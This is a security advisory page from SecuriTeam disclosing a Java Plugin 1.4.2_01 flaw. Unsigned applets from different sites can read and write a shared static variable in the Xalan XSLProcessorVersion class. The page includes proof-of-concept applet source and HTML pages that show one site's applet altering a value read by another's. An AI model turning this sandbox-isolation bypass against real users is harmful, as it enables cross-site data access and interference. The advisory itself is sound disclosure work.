SecuriTeam™ - Cross-Site Java breaks Sandbox Isolation for Unsigned Applets

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam™ in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

Unsigned applets coming from different sites may share data areas via undocumented static variables of the JDK. While altering these variables, JDK's internal states may become corrupt, making JDK not function properly. This especially concerns XML processing which depends on the org.apache.xalan.processor.XSLProcessorVersion class. This behavior violates the isolation restriction of the sandbox.

Credit:
The information has been provided by Marc Schoenefeld.

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Vulnerable systems:
* Java Plugin version 1.4.2_01

Reproduction:
Two applets,
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class

Applet from siteB can share a variable also accessible (read and write) which is used by siteA. So data protection is not guaranteed, an unsigned applet may grab data stored in this variable by a signed applet or interfere its XML processing and therefore violates the isolation restriction of the sandbox.

==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

    public void paint(Graphics g)
    {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

   static {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
   }}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;

public class WriteApplet extends java.applet.Applet {
    public void paint(Graphics g)
    {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }

   static {
      org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered
from
SiteA";
  }
}
==========WRITEAPPLET=========================

=========Write.html============================
< HTML>
< BODY BGCOLOR=#66FF66>
< PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
< applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
< HTML>
< BODY BGCOLOR=#6666FF>
< PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
< applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

Subject:		Date:
From:

	Cisco BBSM Captive Portal Cross-site Scripting
	Cisco Unified Communications Manager Denial of Service Vulnerabilities
	Novell eDirectory Unauthenticated Access to SOAP Interface
	Call of Duty Denial of Service
	Wonderware SuiteLink Denial of Service Vulnerability
	WebMod Multiple Vulnerabilities
	IAX2 Incomplete 3-Way Handshake (Spoofing)
	Multiple Vendor OpenOffice Vulnerabilities
	Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability
	Cisco Network Admission Control Shared Secret Vulnerability
	ClamAV libclamav PeSpin Heap Overflow Vulnerability
	ClamAV libclamav PE WWPack Heap Overflow Vulnerability
	IBM Informix Pre-Authentication Stack Overflow
	Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability
	HP OpenView NNM Buffer Overflow